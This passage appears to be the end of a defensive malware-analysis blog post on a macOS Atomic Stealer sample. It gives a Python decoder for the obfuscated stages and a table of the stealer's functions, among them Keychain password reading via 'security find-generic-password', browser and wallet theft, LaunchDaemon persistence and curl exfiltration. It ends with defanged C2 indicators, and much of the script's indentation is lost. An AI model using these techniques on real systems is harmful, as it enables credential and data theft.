out = bytearray()
for i, b in enumerate(raw):
d = apply_e(b, ea, ec) if i % 2 == 0 else apply_o(b, od, oe)
if d not in valid:
return None
out.append(d)
return bytes(out)
# Pre-compute all valid (form, constants, hex-decoded) for both key and val blob
key_candidates = [] # [(form_name, hex_decoded_key)]
val_candidates = [] # [(form_name, hex_decoded_val)]
for fname, solve_e, solve_o, apply_e, apply_o in forms:
# Key candidates
result = _try_alt_form(raw_key, valid, solve_e, solve_o)
if result:
for ea, ec in result[0][:3]:
for od, oe in result[1][:3]:
dec = _decrypt_with_form(raw_key, apply_e, apply_o, ea, ec, od, oe)
if dec:
try:
key_candidates.append((fname, custom_hex_decode(dec, hex_map)))
except Exception:
pass
# Validation blob candidates
if val_entry:
result2 = _try_alt_form(val_entry['raw_data'], valid, solve_e, solve_o)
if result2:
for ea2, ec2 in result2[0][:2]:
for od2, oe2 in result2[1][:2]:
dec2 = _decrypt_with_form(
val_entry['raw_data'], apply_e, apply_o, ea2, ec2, od2, oe2)
if dec2:
try:
val_candidates.append(
(fname, custom_hex_decode(dec2, hex_map)))
except Exception:
pass
print(f" [search] key candidates={len(key_candidates)}, "
f"val candidates={len(val_candidates)}")
# Cross-validate: for each (key_candidate, val_candidate, post_xor), score
best_score, best_xor, best_key = -1, 0, None
for _, key_hex in key_candidates:
for x in range(256):
ck = bytes(b ^ x for b in key_hex)
for _, vh in val_candidates:
try:
decoded = base64_decode(vh, ck)
score = sum(1 for b in decoded
if 32 <= b < 127 or b in (9, 10, 13))
except Exception:
score = 0
if score > best_score:
best_score = score
best_xor = x
best_key = ck
if best_key is None:
raise ValueError("Could not determine XOR key")
print(f"[INFO] Post-XOR=0x{best_xor:02x}, key size={len(best_key)}, "
f"validation score={best_score}")
print(f"[Stage 1] XOR鍵 (0x{len(best_key):x} bytes): {best_key.hex()}")
return key_entry, best_key, best_xor
def _all_alternating_decryptions(raw, valid):
"""Yield all valid alternating-cipher decryptions of raw data (all 4 forms)."""
_forms = [
(lambda b, h, c: b ^ ((h + c) & 0xFF),
lambda b, h, c: (b - (h ^ c)) & 0xFF,
lambda b, a, c: ((b ^ a) - c) & 0xFF,
lambda b, d, e: ((b - d) & 0xFF) ^ e),
(lambda b, h, c: b ^ ((h + c) & 0xFF),
lambda b, h, c: ((h ^ c) - b) & 0xFF,
lambda b, a, c: ((b ^ a) - c) & 0xFF,
lambda b, d, e: ((b + d) & 0xFF) ^ e),
(lambda b, h, c: b ^ ((h - c) & 0xFF),
lambda b, h, c: (b - (h ^ c)) & 0xFF,
lambda b, a, c: ((b ^ a) + c) & 0xFF,
lambda b, d, e: ((b - d) & 0xFF) ^ e),
(lambda b, h, c: b ^ ((h - c) & 0xFF),
lambda b, h, c: ((h ^ c) - b) & 0xFF,
lambda b, a, c: ((b ^ a) + c) & 0xFF,
lambda b, d, e: ((b + d) & 0xFF) ^ e),
]
for se, so, ae, ao in _forms:
result = _try_alt_form(raw, valid, se, so)
if not result:
continue
for ea, ec in result[0][:2]:
for od, oe in result[1][:2]:
out = bytearray()
ok = True
for i, b in enumerate(raw):
d = ae(b, ea, ec) if i % 2 == 0 else ao(b, od, oe)
if d not in valid:
ok = False
break
out.append(d)
if ok:
yield bytes(out)
def _payload_threshold(analyzed, key_entry):
"""Payload blobs are > 10% of the max size (excluding key)."""
max_sz = max(e['raw_size'] for e in analyzed if e is not key_entry)
return max_sz * 0.1
def find_small_blobs(analyzed, key_entry, final_key, hex_map):
"""Decode small non-key, non-payload blobs, trying all alternating forms
to find the one that produces the most readable output with the validated key."""
results = []
threshold = _payload_threshold(analyzed, key_entry)
valid = _valid_hex_set(hex_map)
for entry in analyzed:
if entry is key_entry:
continue
if entry['raw_size'] >= threshold:
continue
best_decoded, best_score = None, -1
# Try auto-detected algorithm first
if entry.get('decrypted'):
try:
hd = custom_hex_decode(entry['decrypted'], hex_map)
decoded = base64_decode(hd, final_key)
score = sum(1 for b in decoded if 32 <= b < 127 or b in (9, 10, 13))
if score > best_score:
best_score, best_decoded = score, decoded
except Exception:
pass
# Also re-try all 4 alternating forms on raw data with validated key
raw = entry.get('raw_data', b"")
if raw:
for dec_data in _all_alternating_decryptions(raw, valid):
try:
hd = custom_hex_decode(dec_data, hex_map)
decoded = base64_decode(hd, final_key)
score = sum(1 for b in decoded
if 32 <= b < 127 or b in (9, 10, 13))
if score > best_score:
best_score, best_decoded = score, decoded
except Exception:
pass
if best_decoded and best_score > 0:
results.append((entry, best_decoded))
return results
def find_payload_dynamic_xor(analyzed, key_entry, hex_map, final_key):
"""Find payload blobs and brute-force the dynamic XOR key for each."""
valid = _valid_hex_set(hex_map)
threshold = _payload_threshold(analyzed, key_entry)
payload_entries = [e for e in analyzed
if e['raw_size'] >= threshold and e is not key_entry]
if not payload_entries:
print("[WARN] No payload blobs found")
return
sizes_str = ', '.join(str(e['raw_size']) for e in payload_entries)
print(f"\n[INFO] {len(payload_entries)} payload blobs (sizes: {sizes_str})")
# For each payload blob, try all alternating forms to find hex-decodable output
payload_hexdec = []
for pe in payload_entries:
hd = None
# Try auto-detected first
if pe.get('decrypted'):
try:
hd = custom_hex_decode(pe['decrypted'], hex_map)
except Exception:
pass
        # Also try all alternating forms on the raw data
        # (the auto-detected result, if any, is tried first)
        raw = pe.get('raw_data', b"")
        if raw:
            all_hds = [hd] if hd else []
            for dec_data in _all_alternating_decryptions(raw, valid):
                try:
                    all_hds.append(custom_hex_decode(dec_data, hex_map))
                except Exception:
                    pass
            payload_hexdec.append(all_hds if all_hds else None)
elif hd:
payload_hexdec.append([hd])
else:
print(f" [SKIP] func 0x{pe['func_va']:x}: no valid decryption")
payload_hexdec.append(None)
# Brute-force: for each blob, find the XOR key that makes it valid hex chars
print(f"\n{'='*60}")
    print("[Stage 4-9] Dynamic XOR key search")
print(f"{'='*60}")
blob_xor_keys = []
blob_best_hd = [] # best hex-decoded data per blob
all_found = True
for i, hd_list in enumerate(payload_hexdec):
if hd_list is None:
all_found = False
blob_xor_keys.append(None)
blob_best_hd.append(None)
continue
found_key, found_hd = None, None
for hd in hd_list:
sample_head = hd[:2000]
sample_tail = hd[-2000:] if len(hd) > 4000 else b""
for k in range(256):
ok = all((b ^ k) in valid for b in sample_head)
if ok and sample_tail:
ok = all((b ^ k) in valid for b in sample_tail)
if ok:
found_key, found_hd = k, hd
break
if found_key is not None:
break
blob_xor_keys.append(found_key)
blob_best_hd.append(found_hd)
if found_key is not None:
print(f" Blob {i} (func 0x{payload_entries[i]['func_va']:x}): "
f"XOR key=0x{found_key:02x}")
else:
all_found = False
print(f" Blob {i}: no valid XOR key found")
if not all_found:
        print(" [WARN] XOR key not found for some blobs")
return
# Combine: XOR each blob, concatenate, hex_decode, base64_decode
try:
combined = bytearray()
for i, hd in enumerate(blob_best_hd):
k = blob_xor_keys[i]
combined.extend(b ^ k for b in hd)
combined = bytes(combined)
combined_dec = custom_hex_decode(combined, hex_map)
payload = base64_decode(combined_dec, final_key)
print(f"\n Payload size: {len(payload)} bytes")
with open("payload.sh", "wb") as f:
f.write(payload)
        print(" Saved: payload.sh")
        print(payload[:300].decode('ascii', errors='replace'))
    except Exception as e:
        print(f" Combined decryption failed: {e}")
# =============================================================================
# Part 8: Main
# =============================================================================
def main():
mo = MachO(BINARY_PATH)
    print(f"[INFO] Binary: {BINARY_PATH}")
print(f"[INFO] Slice offset: 0x{mo.slice_offset:x}, Entry: 0x{mo.entry_va:x}")
for key, sec in sorted(mo.sections.items(), key=lambda x: x[1]['addr']):
print(f" {key}: 0x{sec['addr']:x}-0x{sec['addr']+sec['size']:x} "
f"({sec['size']} bytes)")
# Step 1: Find hex table
hex_va, hex_map, alphabet = find_hex_table(mo)
print(f"\n[INFO] Hex table VA: 0x{hex_va:x}")
print(f"[INFO] Alphabet: {alphabet}")
# Step 2: Scan code
scan = scan_text_section(mo)
print(f"\n[INFO] Data refs: {len(scan['data_refs'])}, "
f"BL calls: {len(scan['bl_calls'])}")
# Step 3: Build pipeline
main_func, analyzed = build_pipeline(mo, scan, hex_map, hex_va)
if not analyzed:
print("[ERROR] No decrypt functions found")
return
# Step 4: Find XOR key
key_entry, final_key, post_xor = find_post_xor_and_key(analyzed, hex_map, mo)
# Step 5: Decode small blobs (initial command, env check)
small_blobs = find_small_blobs(analyzed, key_entry, final_key, hex_map)
for i, (entry, decoded) in enumerate(small_blobs):
        label = "initial command" if len(decoded) > 50 else "environment check"
print(f"\n[Stage {i+2}] {label} ({len(decoded)} bytes) "
f"[func 0x{entry['func_va']:x}]:")
print(decoded.decode('ascii', errors='replace'))
# Step 6: Payload blobs with dynamic XOR
find_payload_dynamic_xor(analyzed, key_entry, hex_map, final_key)
if __name__ == "__main__":
main()
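Incidentally, the base64_decode stage was identified from the characteristic 6-bit shifts in the disassembly. For reference, a generic custom-alphabet Base64 decoder has the same shape. This is an illustrative sketch only: the sample's variant additionally mixes in a key, which is omitted here.

```python
# Generic custom-alphabet Base64 decoder -- illustrative only.
# The malware's keyed variant builds on this same 6-bit-shift structure.
STD_ALPHABET = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/"

def b64_decode_custom(s: str, alphabet: str = STD_ALPHABET) -> bytes:
    lut = {c: i for i, c in enumerate(alphabet)}  # symbol -> 6-bit value
    buf, bits, out = 0, 0, bytearray()
    for ch in s:
        if ch == '=':          # padding: nothing more to decode
            break
        if ch not in lut:      # skip characters outside the alphabet
            continue
        buf = (buf << 6) | lut[ch]   # the telltale 6-bit shift
        bits += 6
        if bits >= 8:          # a full byte has accumulated
            bits -= 8
            out.append((buf >> bits) & 0xff)
    return bytes(out)
```

With the standard alphabet this reduces to ordinary Base64 (decoding "aGVsbG8=" yields b"hello"); the sample simply swaps in its own alphabet on top of this structure.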
My Ninja Agent built all of this in a single night. Impressive.
osascript
We now analyze the decoded osascript.
Anti-VM functionality
I had AI write the Python decoder for me again. AI really is convenient.
For script-based payloads like this, AI can deobfuscate almost everything. Even a plain chat session will readily propose decoding code for this part, so I won't include an example.
Let's decode the obfuscated strings in bulk.

At a glance, these look like strings intended for anti-VM checks.

The script appears to vary its exit code based on this check.
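For illustration only (the sample's actual strings appear only in the screenshot above): macOS anti-VM checks of this general shape read a hardware report, typically from system_profiler SPHardwareDataType, and change the exit code when hypervisor markers appear. The marker list and names below are hypothetical, not recovered from the sample.

```python
# Hypothetical hypervisor markers -- NOT the strings recovered from the sample
VM_MARKERS = ("vmware", "virtualbox", "qemu", "parallels", "virtual machine")

def looks_like_vm(hw_report: str) -> bool:
    """Return True if a hardware report mentions a known hypervisor."""
    lowered = hw_report.lower()
    return any(marker in lowered for marker in VM_MARKERS)

# On a live macOS host the report would come from:
#   system_profiler SPHardwareDataType
# Here a canned report stands in for it.
sample_report = "Model Name: Mac\nModel Identifier: VMware7,1"
exit_code = 1 if looks_like_vm(sample_report) else 0  # non-zero inside a VM
```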
Main functionality
Next, let's look at the contents of the main osascript.

A lot of functionality is visible here, but walking through every function by hand would be painful, so I fed the script to AI and had it enumerate each function.
| Function name | Decoded functionality | MITRE ATT&CK |
|---|---|---|
| ngtywyvgam | macOS password theft (fake "macOS wants to make changes" dialog) + Chrome Keychain password retrieval (security find-generic-password -ga 'Chrome') | T1056, T1555.001 |
| yztlutlwlsrt | Chromium browser data theft | T1539, T1005 |
| kbxhhohc | Firefox data theft | T1539, T1005 |
| fjitiugedax | Safari cookies + Apple Notes + Keychain + Desktop/Documents files (txt, pdf, docx, wallet, key, kdbx, seed, etc.; 30 MB limit) | T1005, T1213 |
| fzubdcbu | Retrieval of all notes via the Apple Notes API → notes.html | T1213 |
| eofbcgfnts | Telegram Desktop | T1005 |
| tqflqsxxym | Ledger Live impersonation: deletes the legitimate app → downloads app.zip from C2 → installs it | T1565.001 |
| xhvccfehowdd | Trezor Suite impersonation: same as above | T1565.001 |
| lxdpccylr | Brave impersonation: same as above | T1565.001 |
| jyfkoxepb | LaunchDaemon persistence: creates a plist (com.apple.accountsd.helper) + sudo -S | T1543.001 |
| aoecelrx | C2 data exfiltration: curl POST (with chunked-upload support) | T1041 |
| wqunenpmgpvc | Chrome extension data theft (250+ extension IDs, targeting crypto wallets and password managers) | T1176 |
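The chunked curl POST in aoecelrx (T1041) deserves a note: splitting the stolen archive keeps each request small and less conspicuous. Below is a minimal sketch of the chunking pattern; the chunk size is a hypothetical 1 MB, not the sample's value, and the POST target would be the C2 listed in the IOC section.

```python
def split_chunks(data: bytes, chunk_size: int) -> list:
    """Split an archive into fixed-size chunks (the last may be shorter)."""
    return [data[i:i + chunk_size] for i in range(0, len(data), chunk_size)]

# Each chunk would then be sent roughly as:
#   curl -X POST --data-binary @chunk_N <C2 URL>/contact
# (URL redacted here; 1 MB chunk size is a hypothetical example.)
chunks = split_chunks(b"A" * 2_500_000, 1_000_000)
```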
IOC
Handle these with extreme care.
| Description | IOC |
|---|---|
| ClickFix URL | hxxps[:]//chatgpt-codex[.]gitlab[.]io/cdx/? |
| ClickFix payload URL | hxxps[:]//cvols[.]com/curl/b952a8e1492d1d53fdcb794fd8d3d7a6b2a7ba0a6666a432d90cdca34de4d2b0 |
| helper download URL | hxxps[:]//cvols[.]com/jetbrains/update |
| C2 URL | hxxps[:]//atcoconst[.]com/contact |
| C2 IP | hxxp[:]//45[.]94[.]47[.]112/contact |
| Domain | szfried[.]com |
| helper hash | ffc4eb37a4b715525fc7bc8ca3c0b8efbc56cc4429407c07a4f686f9c19d249e |
| helper hash | edb8fd7de3a697af7f153390f22a6b16fc5821cabd4a74c84f49d9c4b66500fa |
Summary
In this post we analyzed the Atomic Stealer attack chain, with the focus on binary analysis. By decrypting the obfuscated functionality and C2 information, we can now infer the malware's behavior to a reasonable degree.
I believe the decryption and analysis procedures have been fully covered above, so I hope this helps the blue teamers of the world with incident response and threat analysis.

